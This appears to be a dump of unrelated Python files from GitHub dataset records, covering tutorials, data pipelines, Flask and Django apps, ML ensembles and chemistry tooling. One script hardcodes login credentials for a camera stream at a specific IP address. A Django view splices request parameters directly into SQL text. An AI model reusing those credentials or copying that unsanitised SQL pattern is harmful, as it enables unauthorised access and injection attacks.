查看人的role属性\r\nprint(Person.walk) # 引用人的走路方法,注意,这里不是在调用\r\n\r\negg = Person('egon', 10, 1000) # 类名()就等于在执行Person.__init__()\r\n# 执行完__init__()就会返回一个对象。这个对象类似一个字典,存着属于这个人本身的一些属性和方法。\r\n# 你可以偷偷的理解:egg = {'name':'egon','walk':walk}\r\n\r\nha2 = Dog('二愣子', '哈士奇', 10, 1000) # 创造了一只实实在在的狗ha2\r\nprint('二哈初始血量:' + str(ha2.life_value)) # 看看ha2的生命值\r\negg.attack(ha2) # egg打了ha2一下\r\nprint('二哈血量:' + str(ha2.life_value)) # ha2掉了10点血","repo_name":"EItByTe/pytorch_tutorial","sub_path":"class&object/class_object_test.py","file_name":"class_object_test.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11251370127","text":"# 匹配类标签: 婚姻状况\nfrom pyspark.sql import functions as F\nfrom tag.base.TemplateClass import AbstractBaseModel\nfrom tag.utils.TagLevel5Common import dataFrameToDict\n\n\n@F.udf\ndef marriageToTagsId(marriage, fiveDictStr):\n fiveDict = eval(fiveDictStr)\n if marriage == '未婚':\n marriage = 1\n elif marriage == '已婚':\n marriage = 2\n elif marriage == '离异':\n marriage = 3\n\n return fiveDict[str(marriage)]\n\n\nclass Marriage(AbstractBaseModel):\n\n def compute(self,esDF, fiveDF):\n\n fiveDict = dataFrameToDict(fiveDF)\n newDF = esDF.select(esDF.user_id.alias('user_id'), marriageToTagsId(esDF.marriage_state, F.lit(str(fiveDict))).alias('tagsid'))\n\n return newDF\n\n\n# Marriage1 = Marriage('MarriageTask', 545)\n# Marriage1.execute()","repo_name":"DUTzimo/insurance_up","sub_path":"_02_insuranceup_script/BaoXian_Project/tag/policy_client/MarriageChild.py","file_name":"MarriageChild.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3507473495","text":"from flask import Flask, render_template, request\nfrom utils import fetch_data_from_api, get_data_for_moran, moran_local_regression, plot_folium_map\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n grid_id = request.form.get('grid_id')\n start_time = datetime.strptime(request.form.get('start_time'), '%Y-%m-%dT%H:%M')\n end_time = datetime.strptime(request.form.get('end_time'), '%Y-%m-%dT%H:%M')\n else:\n # Specify the airqloud_id\n grid_id = \"64b7baccf2b99f00296acd59\"\n start_time = datetime(2023, 10, 5, 9, 0, 0)\n end_time = datetime(2023, 11, 5, 9, 0, 0)\n\n page = 1\n\n # Call the function with the desired start and end times\n data = fetch_data_from_api(grid_id, start_time, end_time, page)\n\n if data:\n # Get the GeoDataFrame with relevant data\n gdf = get_data_for_moran(data)\n # Check if 'calibratedValue' is present before dropping NaN values\n if 'calibratedValue' in gdf.columns:\n print(\"Number of NaN values in calibratedValue:\", gdf['calibratedValue'].isna().sum())\n gdf = gdf.dropna(subset=['calibratedValue'])\n print(gdf.info())\n # Calculate Local Moran's I\n moran_loc = moran_local_regression(gdf)\n plot_folium_map(moran_loc, gdf)\n print(\"Local Moran's I saved in cluster_map.html\")\n # plot_moran_local(moran_loc, gdf)\n\n # Render the template with the Folium map and pass the gdf variable\n return render_template('index.html', gdf=gdf)\n\n else:\n print(\"No measurements for this search.\")\n return \"No measurements for this search.\"\n\n else:\n print(\"Failed to fetch data from the API.\")\n return \"Failed to fetch data from the API.\"\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('error.html', error_message=\"Page not found\"), 404\n\n# Custom error handler for general exceptions\n@app.errorhandler(Exception)\ndef handle_exception(e):\n return render_template('error.html', error_message=str(e)), 500\n\nif __name__ == '__main__':\n app.run(debug=True)\n ","repo_name":"wabinyai/My_research-lab","sub_path":"src/local_moran_with_API/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3566177429","text":"\n###\n#\n# Constants used for the communication\n#\n# Ranges\n# Sensors 0x00 - 0x6F\n# Actuators 0x70 - 0xDF\n# Miscellaneous 0xE0 - 0xFF\n#\n###\n\n\n##\n#\n# Const for the Discovery Process\n#\n##\n\n# -- Sensors -- #\n\nSENSOR_TEMPERATURE = 0x01\nSENSOR_TEMP = 0x01\n\nSENSOR_HUMIDITY = 0x02\nSENSOR_HUM = 0x02\n\nSENSOR_LIGHT = 0x03\n\nSENSOR_COLOR = 0x04\n\n\n# -- Actuators -- #\n\nACTR_SERVO = 0x70\nACTR_PELTIER = 0x71\nACTR_LED = 0x72\nACTR_SIREN = 0x73\n\n\n# -- Predefined PORTS -- #\n\nPORT_DEBUG = 0xFE\nPORT_DISCOVERY = 0xFF","repo_name":"Baeshen/RasPiHome","sub_path":"pi/ctrl/python/src/lib/libCom.py","file_name":"libCom.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41893453442","text":"from pymongo import MongoClient\n#https://api.mongodb.com/python/current/tutorial.html\nfrom datetime import datetime\nimport json\nimport pandas as pd\n\nclass dbConnection:\n client = MongoClient()\n testhost = \"localhost\"\n testIP = 3001\n devURI = \"mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb\"\n prodURI = \"\"\n nameDB = \"\"\n nameCollection = \"\"\n\n def __init__(self, devEnv = True, DB = 'termestimate', collection='job_keywords'):\n\n if devEnv == True:\n self.client = MongoClient(self.devURI)\n else:\n self.client = MongoClient(self.prodURI)\n self.nameDB = self.client[DB]\n\n self.nameCollection = self.nameDB[collection]\n\n def insertData(self, jsonObject):\n self.nameCollection.insert_many(jsonObject)\n\n def returnUniqueQueryValues(self):\n return self.nameCollection.distinct(\"query\")\n\n def returnKeywordValues(self, query,limit_amount=75):\n return_amount =3\n\n result = self.nameCollection.find({\"query\":query, \"keyword_count\" : {\"$gte\" : 2}},{\"_id\": 0, \"time\":0 }).sort(\"keyword_count\", -1).limit(limit_amount)\n list_result = list(result)\n nouns = [x for x in list_result if x['POS'] == 'Noun'][: return_amount]\n print(\"nouns\")\n print(nouns)\n verbs = [x for x in list_result if x['POS'] == 'Verb'][: return_amount]\n print(\"verbs\")\n print(verbs)\n adjectives = [x for x in list_result if x['POS'] == 'Adjective'][: return_amount]\n print(\"adjectives\")\n print(adjectives)\n adverbs = [x for x in list_result if x['POS'] == 'Adverb'][: return_amount]\n print (list_result)\n topNum = list_result[0]['keyword_count']\n print(\"Top keyword count\")\n print(topNum)\n return ({\"all\":list_result,\"nouns\":nouns,\"verbs\":verbs,\"adjectives\":adjectives, \"adverbs\":adverbs,\"high_keyword\":topNum})\n\n def returnQueryValues(self, keyword, limit_amount=5):\n result = self.nameCollection.find({\"keyword\": keyword,\"Skill\":1}, {\"_id\": 0, \"time\": 0}).sort(\"keyword_count\", -1).limit(limit_amount)\n list_result = list(result)\n\n\n print (list_result)\n return (list_result)\n\n def insert_df(self, df):\n records = json.loads(df.T.to_json()).values()\n self.nameCollection.insert_many(records)\n\n def returnDirectory(self):\n result = self.nameCollection.find({} ,{\"_id\": 0})\n list_result = list(result)\n print (list_result)\n return (list_result)","repo_name":"dmeyers83/TermEstimate","sub_path":"databaseConnection.py","file_name":"databaseConnection.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23882214020","text":"# https://leetcode.com/problems/meeting-rooms\n\nclass Solution(object):\n def canAttendMeetings(self, intervals):\n \"\"\"\n :type intervals: List[List[int]]\n :rtype: bool\n \"\"\"\n min_rooms = 1\n \n # Time Complexity O(nlogn)\n # Space Complexity O(1)\n \n # 1. Sort the array based on end time\n new_intervals = sorted(intervals,key=lambda x: x[1])\n \n # For every interval:\n for i in range(1,len(new_intervals)):\n # Check if curr interval start time is less than prev interval end time\n if new_intervals[i][0] < new_intervals[i-1][1]:\n # Return False\n return False\n \n # If it reached the end, return True as the person can attend all meetings \n return True\n \n \n","repo_name":"sanafathima418/DSA-Practice","sub_path":"Meeting_Rooms.py","file_name":"Meeting_Rooms.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73940596967","text":"import cv2\nimport time\nfrom datetime import datetime\nimport getpass\n\n#imagesFolder = \"C:/Users//documents\"\n\n# https://stackoverflow.com/questions/842059/is-there-a-portable-way-to-get-the-current-username-in-python\nimagesFolder = \"./images\"\n\n#cap = cv2.VideoCapture(\"rtsp://username:password@cameraIP/axis-media/media.amp\")\n\n# Use public RTSP Streaming for testing, but I am getting black frames!\ncap = cv2.VideoCapture(\"rtsp://watch:ZimaLeto2022@93.188.122.139:554/cam/realmonitor?channel=1&subtype=0\")\nframeRate = cap.get(5) #frame rate\ncount = 0\n\n\nwhile cap.isOpened():\n start_time = time.time()\n\n frameId = cap.get(1) # current frame number\n ret, frame = cap.read()\n\n if (ret != True):\n break\n\n filename = imagesFolder + \"/image_\" + str(datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\")) + \".jpg\"\n cv2.imwrite(filename, frame)\n\n # Show frame for testing\n cv2.imshow('frame', frame)\n cv2.waitKey(1)\n\n count += 1\n\n #Break loop after 24*60 minus\n if count > 24*60:\n break\n\n elapsed_time = time.time() - start_time\n\n # Wait for 60 seconds (subtract elapsed_time in order to be accurate).\n time.sleep(60 - elapsed_time)\n\n\ncap.release()\nprint (\"Done!\")\n\ncv2.destroyAllWindows()\n","repo_name":"yrguba/recognition","sub_path":"rec.py","file_name":"rec.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69904786410","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 24 12:49:30 2018\n\n@author: Homagni\n\"\"\"\n'''\nREFERECES USED:\n http://scikit-learn.org/stable/auto_examples/ensemble/plot_adaboost_hastie_10_2.html#sphx-glr-auto-examples-ensemble-plot-adaboost-hastie-10-2-py\n http://scikit-learn.org/stable/auto_examples/classification/plot_classifier_comparison.html#sphx-glr-auto-examples-classification-plot-classifier-comparison-py\n http://scikit-learn.org/stable/modules/ensemble.html\n \n'''\nprint(__doc__)\nimport copy\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.decomposition import PCA\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import zero_one_loss\nfrom sklearn.ensemble import AdaBoostClassifier\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import VotingClassifier\n\nnp.random.seed(11)\nclass ensembleLearners(object):\n def __init__(self,train,test,techniques,parameters):\n self.train=np.loadtxt(train,delimiter=',',skiprows=1) #First row is the metadata\n self.test=np.loadtxt(test,delimiter=',',skiprows=1) #First row is the metadata\n \n self.techniques=techniques\n self.parameters=parameters\n self.n_estimators = 400 #used in RF type models\n self.n_neighbors=200 #used in knn type models\n self.names=[]\n self.models=[]\n # A learning rate of 1. may not be optimal for both SAMME and SAMME.R\n self.learning_rate = 0.1\n def processData(self):\n self.x_train=self.train[:,0:4]\n self.y_train=self.train[:,-1]\n \n self.x_test=self.test[:,0:4]\n self.y_test=self.test[:,-1]\n #self.a = self.a[~np.isnan(self.a)] #sample usage to remove nans\n def Dstump(self):\n self.dt_stump = DecisionTreeClassifier(max_depth=1, min_samples_leaf=1)\n self.dt_stump.fit(self.x_train, self.y_train)\n self.dt_stump_err = 1.0 - self.dt_stump.score(self.x_test, self.y_test)\n \n def makemodel1(self): #make models for task 1\n self.ada_discrete = AdaBoostClassifier(base_estimator=self.dt_stump,learning_rate=self.learning_rate,n_estimators=self.n_estimators,algorithm=\"SAMME\") #Unfortunately scipy does not have samme.M1\n self.rf=RandomForestClassifier(n_estimators=self.n_estimators, max_depth=1, min_samples_split=2, min_samples_leaf=1) #Random forest based on decision stumps\n \n self.names.extend(['ada_discrete','random_forest'])\n self.models.extend([self.ada_discrete,self.rf])\n def makemodel2(self): #make models for task 2\n self.NN=MLPClassifier(hidden_layer_sizes=(150,100,50,), activation='logistic', solver='adam', alpha=0.0001, batch_size='auto', learning_rate='constant', learning_rate_init=0.01, max_iter=200, shuffle=True, random_state=None, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True, early_stopping=True)\n self.knn=KNeighborsClassifier(n_neighbors=self.n_neighbors, weights='distance',leaf_size=10, p=2, metric='minkowski')\n self.LR=LogisticRegression(penalty='l1', dual=False, tol=0.0001, C=0.1, fit_intercept=True, intercept_scaling=1, class_weight='balanced', random_state=None, solver='liblinear', max_iter=200, multi_class='ovr', verbose=0, warm_start=False, n_jobs=1)\n self.NB=BernoulliNB(alpha=0.8, binarize=0.02, fit_prior=False, class_prior=None)\n self.DT=DecisionTreeClassifier(criterion='gini', splitter='random', max_depth=4, min_samples_split=100, min_samples_leaf=50, min_weight_fraction_leaf=0.0, max_features=4, random_state=None, max_leaf_nodes=None, min_impurity_decrease=0.0, min_impurity_split=None, class_weight=None, presort=False)\n \n self.names.extend(['Neural networks','k-Nearest Neighbor','Logistic regression','Naive Bayes','Decision trees'])\n self.models.extend([self.NN,self.knn,self.LR,self.NB,self.DT])\n def makevoting(self,weights):\n a=copy.copy(self.names)\n b=copy.copy(self.models)\n if(not weights):\n self.vc=VotingClassifier([[a,b] for a,b in zip(a, b)], voting='hard', weights=None, n_jobs=1, flatten_transform=None)\n else:\n self.vc=VotingClassifier([[a,b] for a,b in zip(a, b)], voting='hard', weights=weights, n_jobs=1, flatten_transform=None)\n self.names.append('voting_classifier')\n self.models.append(self.vc)\n def fitmodels(self,start):\n if(start None:\n ''' Adds a dictionary entry {filename: {metadata}} to the\n metadata map.\n\n @params:\n - filename: the filename of the entry\n - metadata: reddit post metadata associated to the given filename\n '''\n self._metadata_map[filename] = metadata\n\n def get_map(self) -> dict:\n ''' Returns the metadata map composed of one or more\n {filename: reddit metadata}\n\n @return: dictionary of the following format\n {filename: {metadata}, filename: {metadata}, ...}\n\n Note: filenames are the keys of the map\n '''\n return self._metadata_map\n\n def show_metadata(self, filename: str):\n ''' Prints to the console the Reddit post metadata associated\n with the given @filename if it is found.\n '''\n try:\n with open(self.json_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n if filename in data.keys():\n print('\\n')\n pprint(data[filename])\n else:\n self.log.info(f'Metadata for `{filename}` not found')\n except IOError:\n self.log.info('Database not found. Must download content first')\n\n def show_link(self, filename: str):\n ''' Prints to the console the Reddit post URL link of the given\n media filename.\n '''\n try:\n with open(self.json_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n if filename in data.keys():\n print(f\"\\nLink: {data[filename]['Link']}\")\n else:\n self.log.info(f'Metadata for `{filename}` not found')\n except IOError:\n self.log.info('Database not found. Must download content first')\n","repo_name":"emanuel2718/myredditdl","sub_path":"myredditdl/metadata_handler.py","file_name":"metadata_handler.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"952893534","text":"import base64\nimport datetime\nimport numbers\nfrom io import BytesIO\n\nimport matplotlib.pyplot\nimport matplotlib.pyplot as plt\nimport pandas\nimport sqlalchemy\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nfrom django.views.generic import DetailView\nfrom django.conf import settings\nfrom pandas import DataFrame\nfrom pandas.api.types import is_numeric_dtype\nfrom django.utils import timezone\nfrom sqlalchemy.exc import ResourceClosedError\n\nfrom users.models import Profile\nfrom ..common.access import user_can_access_query\nfrom ..common.components import users_recent_results\nfrom ..models import Query, Parameter, Result, Value, QueryError\n\nmax_table_rows = settings.MAX_TABLE_ROWS\nimage_encoding = 'jpg'\nempty_df_message = 'Query successful.'\n\n# So that server does not create (and then destroy) GUI windows that will never be seen\nmatplotlib.pyplot.switch_backend('Agg')\n\n\nclass ResultDetailView(LoginRequiredMixin, DetailView):\n model = Result\n context_object_name = 'result'\n\n def get_object(self, queryset=None):\n user = self.request.user\n result = get_object_or_404(Result, id=self.kwargs.get('pk'))\n user_can_access_query(user, result.query)\n result.last_view_timestamp = timezone.now()\n result.view_count = result.view_count + 1\n result.save()\n return result\n\n def get_context_data(self, **kwargs):\n context = super(ResultDetailView, self).get_context_data(**kwargs)\n values = Value.objects.filter(result=self.object)\n params = Parameter.objects.filter(query=self.object.query)\n\n has_valid_parameters = True\n for value in values:\n # if the value of this result does not match any of the current parameters of the query\n if not any(parameter.name == value.parameter_name for parameter in params):\n has_valid_parameters = False\n for param in params:\n # if a current parameter for the query doesn't match any of the saved values\n if not any(param.name == value.parameter_name for value in values):\n has_valid_parameters = False\n context['params'] = values\n # getting historic results\n context['results'] = users_recent_results(query=self.object.query, user=self.request.user)\n context['selected_result'] = self.object\n context['has_valid_parameters'] = has_valid_parameters\n # TODO constructing API URL\n api_params = f\"?api_key={self.request.user.profile.api_key}\"\n\n if has_valid_parameters:\n for value in values:\n api_params += f\"&{value.parameter_name}={value.value}\"\n else:\n for param in params:\n api_params += f\"&{param.name}=[{param.name} value]\"\n context['api_url'] = f\"http://{self.request.get_host()}/api/{self.object.query.id}/{api_params}\"\n return context\n\n\ndef execute(request, query_id):\n user = request.user\n if not user.is_authenticated:\n return redirect(reverse('login'))\n query = get_object_or_404(Query, pk=query_id)\n user_can_access_query(user, query)\n if settings.DEBUG:\n result = get_result(request, query)\n # record this is a success\n query.increment_success()\n return redirect(reverse('result-detail', args=[result.pk]))\n else:\n try:\n result = get_result(request, query)\n # record this is a success\n query.increment_success()\n return redirect(reverse('result-detail', args=[result.pk]))\n except Exception as err:\n # log the error\n query_error = QueryError(\n user=request.user,\n query=query,\n error=err\n )\n query_error.save()\n # record error with query version\n query.increment_failure()\n # report to user\n context = {\n 'query': query,\n 'error': err,\n }\n return render(request, 'queries/result_error.html', context)\n\n\ndef execute_api(request, query_id):\n api_key = request.GET.get('api_key')\n try:\n profile = Profile.objects.get(api_key=api_key)\n user = profile.user\n except Profile.DoesNotExist:\n user = None\n if user is None or not user.is_authenticated:\n return JsonResponse({'error': 'User not authenticated'})\n query = get_object_or_404(Query, pk=query_id)\n user_can_access_query(user, query)\n try:\n data = get_data(request, query, request_type=\"GET\")\n json = {'title': data.title}\n row_count = len(data.df.index)\n if row_count == 0:\n if len(data.df.columns.values) == 0:\n print(\"no results\")\n json.update({\"message\": \"Success. (no rows returned)\"})\n else:\n print(\"no data\")\n json.update({\"columns\": list(data.df.columns.values)})\n json.update({\"data\": []})\n else:\n print(\"data to dict\")\n table = data.df.to_dict(orient='split')\n del table['index']\n json.update(table)\n return JsonResponse(json)\n except Exception as err:\n # log the error\n query_error = QueryError(\n user=request.user,\n query=query,\n error=err\n )\n query_error.save()\n return JsonResponse({'error': str(err)})\n\n\nclass ResultData:\n def __init__(self, df, title, sql, param_values):\n self.df = df\n self.title = title\n self.sql = sql\n self.param_values = param_values\n\n\n# with the result data, creating charts and tables\ndef get_result(request, query, save_result=True):\n data = get_data(request, query)\n df = data.df\n result_title = data.title\n sql = data.sql\n param_values = data.param_values\n row_count = len(df.index)\n column_count = df.columns.size\n chart = get_chart(df, result_title)\n # if chart is None:\n\n if row_count == 1 and column_count == 1:\n single = df.iat[0, 0]\n elif row_count == 0:\n if len(df.columns.values) == 0:\n single = \"Success. (no rows returned)\"\n else:\n column_titles = str(list(df.columns.values))\n single = f\"columns: {column_titles}\"\n elif df.empty:\n single = empty_df_message\n else:\n single = None\n result = Result(\n user=request.user,\n query=query,\n title=result_title,\n dataframe=df.to_json(),\n table=get_table(df),\n single=single,\n image_encoding=image_encoding,\n chart=chart,\n last_view_timestamp=timezone.now(),\n version_number=query.get_version_number(),\n query_text=sql\n )\n if save_result:\n result.save()\n # update query with latest result\n query.run_count += 1\n query.last_run_date = timezone.now()\n query.last_viewed = timezone.now()\n query.latest_result = result\n query.save()\n # save parameter values\n for param_name, param_value in param_values.items():\n value = Value(\n parameter_name=param_name,\n value=param_value,\n result=result\n )\n value.save()\n return result\n\n\n# 1. Getting the user, query and parameters\n# 2. Creating a connection to the db\n# 3. Replacing placeholder parameters with their values\n# 4. Executing the query\ndef get_data(request, query, request_type=None):\n user = request.user\n user_can_access_query(user, query)\n params = Parameter.objects.filter(query=query)\n # creating context for params data\n sql = query.query\n result_title = query.title\n param_values = {}\n for param in params:\n if request_type == \"GET\":\n param_value = request.GET.get(param.name)\n else:\n param_value = request.POST.get(param.name)\n\n if param_value is None:\n param_value = param.default\n param_values[param.name] = param_value\n # if there are results, save the param value as default\n sql = sql.replace(f\"{{{param.name}}}\", param_value)\n # adding param values to the result title\n result_title = f\"{result_title};\\n {param.name}: {param_value}\"\n # formatting the text to avoid problems with the % character in queries\n sql = sqlalchemy.text(sql)\n db = query.database\n engine = db.get_engine_with_user(user=user)\n\n with engine.connect().execution_options(isolation_level=\"AUTOCOMMIT\") as connection:\n try:\n df = pandas.read_sql(sql, connection)\n if len(df.index > max_table_rows):\n df = df.head(max_table_rows)\n # Error happens if no rows are returned (e.g. a drop or create statement)\n # original solution used https://stackoverflow.com/a/12060886/2595659 and first\n # made sure there were rows, but the solution did not always create a dataframe\n # with the correct data types (they were being interpreted as object).\n # Though I do not love this ResourceClosedError solution because\n # there may be other reasons the connection can be closed\n except ResourceClosedError:\n df = pandas.DataFrame()\n engine.dispose()\n return ResultData(\n df=df,\n title=result_title,\n sql=sql,\n param_values=param_values\n )\n\n\n# https://www.section.io/engineering-education/representing-data-in-django-using-matplotlib/\n# possible idea for returning only image from endpoint: https://groups.google.com/g/pydata/c/yxKcJI4Y7e8\ndef get_graph():\n buffer = BytesIO()\n plt.savefig(buffer, format=image_encoding)\n buffer.seek(0)\n image_data = buffer.getvalue()\n graph = base64.b64encode(image_data)\n graph = graph.decode('utf-8')\n buffer.close()\n return graph\n\n\ndef get_svg_graph():\n buffer = BytesIO()\n plt.savefig(buffer, format='svg')\n buffer.seek(0)\n image_data = str(buffer.getvalue())\n image_data = image_data.replace('\\\\n', '\\n')\n buffer.close()\n return image_data\n\n\ndef get_chart(df, title):\n plt.style.use('dark_background')\n header = df.head()\n columns = list(header.columns.values)\n row_count = len(df.index)\n col_count = len(columns)\n if row_count < 2 or col_count < 2:\n return None\n first_value = df[columns[0]].iat[0]\n second_value = df[columns[1]].iat[0]\n third_value = None\n if col_count >= 3:\n third_value = df[columns[2]].iat[0]\n is_bar_or_pie = len(columns) == 2 and row_count > 1 and is_numeric_dtype(df.iloc[:, 1])\n is_pivot = (len(columns) == 3\n and row_count > 1\n and first_value is not None\n and second_value is not None\n and third_value is not None\n and (isinstance(first_value, datetime.date) or isinstance(first_value, numbers.Number))\n and isinstance(second_value, str)\n and isinstance(third_value, numbers.Number))\n if not is_bar_or_pie and not is_pivot:\n return None\n # if first_value is number or date, assume this is a bar chart\n is_bar = (first_value is not None\n and isinstance(first_value, (datetime.date, numbers.Number)))\n\n if is_pivot:\n # https://stackoverflow.com/a/48799804/2595659\n df.groupby([columns[0], columns[1]])[columns[2]] \\\n .sum() \\\n .unstack(level=1) \\\n .plot.area()\n # .plot.bar(stacked=True)\n\n\n elif is_bar:\n df.plot(x=columns[0], y=columns[1], kind='bar', figsize=(7, 4), legend=False, title=title)\n plt.locator_params(axis='x', nbins=10) # reduce the number of ticks\n # Else, pie chart\n else:\n # converting first column to a string\n df[columns[0]] = df[columns[0]].astype(str)\n grouped = df.groupby([columns[0]]).sum().sort_values([columns[1]], ascending=False)\n\n # row count:\n row_count = len(grouped.index)\n max_rows = 49\n if row_count > max_rows:\n # splitting dataframe by row index\n df1 = grouped.iloc[:max_rows, :]\n # summing the remainder\n df2 = grouped.iloc[max_rows:, :].sum()\n # adding sum of remainder columns as final row\n df1.loc['Remaining Values', :] = df2.sum(axis=0)\n grouped = df1\n grouped.plot(y=columns[1], autopct='%1.1f%%', kind='pie', figsize=(7, 4), legend=False, title=title)\n plt.axis('off')\n plt.tight_layout()\n chart = get_graph()\n return chart\n\n\ndef get_table(df):\n css_classes = \"table table_dark table-sm table-responsive\"\n table_id = \"results\"\n row_count = len(df.index)\n if row_count == 0:\n columns = list(df.columns.values)\n table = f\"\"\n table += \"
{column}
\"\n return table\n else:\n return df.to_html(classes=[css_classes],\n table_id=table_id,\n index=False)\n","repo_name":"brianrisk/qwaver","sub_path":"queries/views/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":13293,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"17067384159","text":"#!/usr/bin/env python3\n\nfrom time import clock\nfrom random import random, seed, shuffle\nfrom jimn.tree.treap import Treap\n\nroot = Treap(2000, root_node=True)\nseconds = clock()\nprint(seconds)\nseed(seconds)\n\nprint(\"creation\")\nvalues = []\nfor _ in range(10):\n new_value = random()\n values.append(new_value)\n print(\"adding:\", new_value)\n root.add(new_value)\n root.tycat()\n\nprint(\"neighbours\")\nfor value in sorted(values):\n neighbours = [n.content for n in root.find(value).neighbours()]\n print(value, \"is neighboured by\", [str(v) for v in neighbours])\n\nprint(\"nodes greater than 0.5\")\nhalf = root.add(0.5)\nroot.tycat()\nfor node in half.greater_nodes():\n print(node.dot_label())\nvalues.append(0.5)\n\nprint(\"infix walk\")\nfor content in root.ordered_contents():\n print(content)\n\nprint(\"destruction\")\nshuffle(values)\nfor value in values:\n print(\"removing:\", value)\n node = root.find(value)\n node.remove()\n root.tycat()\n","repo_name":"wagnerf42/Jimn","sub_path":"src/interactive_tests/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10164440697","text":"import os\nimport subprocess\nimport tempfile\nfrom typing import Literal\n\nfrom asapdiscovery.data.openeye import (\n load_openeye_sdfs,\n oechem,\n oequacpac,\n save_openeye_sdfs,\n)\nfrom asapdiscovery.data.schema_v2.ligand import Ligand\nfrom asapdiscovery.data.state_expanders.state_expander import StateExpanderBase\nfrom pydantic import Field\n\n\nclass ProtomerExpander(StateExpanderBase):\n \"\"\"\n Expand a molecule to protomers using OpenEye reasonable protomer state enumeration.\n\n Note:\n The input molecule is included in the output.\n \"\"\"\n\n expander_type: Literal[\"ProtomerExpander\"] = \"ProtomerExpander\"\n\n def _provenance(self) -> dict[str, str]:\n return {\n \"oechem\": oechem.OEChemGetVersion(),\n \"quacpac\": oequacpac.OEQuacPacGetVersion(),\n }\n\n def _expand(self, ligands: list[Ligand]) -> list[Ligand]:\n expanded_states = []\n provenance = self.provenance()\n for parent_ligand in ligands:\n oemol = parent_ligand.to_oemol()\n for protomer in oequacpac.OEGetReasonableProtomers(oemol):\n fmol = oechem.OEMol(protomer)\n # copy the ligand properties over to the new molecule, we may want to have more fine grained control over this\n # down the track.\n protomer_ligand = Ligand.from_oemol(fmol, **parent_ligand.dict())\n if protomer_ligand.fixed_inchikey != parent_ligand.fixed_inchikey:\n # only add tags to new microstates of the input molecule\n protomer_ligand.set_expansion(\n parent=parent_ligand, provenance=provenance\n )\n expanded_states.append(protomer_ligand)\n else:\n expanded_states.append(parent_ligand)\n # add the parent if it is not present.\n if parent_ligand not in expanded_states:\n expanded_states.append(parent_ligand)\n\n return expanded_states\n\n\nclass EpikExpander(StateExpanderBase):\n \"\"\"\n Expand the protomer and tautomeric states of a molecule using epik and capture the state penalties.\n\n Note:\n The method assumes you have schrodinger software installed and the path to the software is exported as a\n environment variable named SCHRODINGER.\n \"\"\"\n\n expander_type: Literal[\"EpikExpander\"] = \"EpikExpander\"\n\n ph: float = Field(\n 7.3,\n description=\"The ph that should be used when calculating the state penalty.\",\n )\n\n def _create_cmd(self, *programs: str) -> str:\n \"\"\"\n Create a command which can be used to call some SCHRODINGER software\n Returns\n -------\n The string which can be passed to subprocess to call epik\n \"\"\"\n # create a path to epik\n schrodinger_folder = os.getenv(\"SCHRODINGER\")\n if schrodinger_folder is None:\n raise RuntimeError(\n \"Epik enumerator requires the path to the schrodinger software to be set as the \"\n \"SCHRODINGER environment variable.\"\n )\n epik = os.path.join(schrodinger_folder, *programs)\n return epik\n\n def _provenance(self) -> dict[str, str]:\n \"\"\"\n Run epik to get the version info.\n Returns\n -------\n The version of epik used.\n \"\"\"\n epik_cmd = self._create_cmd(\"epik\")\n # call epik to get the version info\n output = subprocess.check_output([epik_cmd, \"-v\"])\n for line in output.decode(\"utf-8\").split(\"\\n\"):\n if \"Epik version\" in line:\n version = line.split()[-1]\n break\n else:\n version = \"unknown\"\n\n return {\n \"epik\": version,\n }\n\n def _prepare_ligands(self, ligands: list[Ligand]):\n \"\"\"\n Convert the list of Ligands to a SCHRODINGER mae file before running with Epik.\n \"\"\"\n oe_ligands = [ligand.to_oemol() for ligand in ligands]\n save_openeye_sdfs(oe_ligands, \"input.sdf\")\n convert_cmd = self._create_cmd(\"utilities\", \"structconvert\")\n with open(\"structconvert.log\", \"w\") as log:\n subprocess.run(\n convert_cmd + \" input.sdf input.mae\",\n shell=True,\n stdout=log,\n stderr=log,\n check=True,\n )\n\n def _extract_ligands(self) -> list[Ligand]:\n 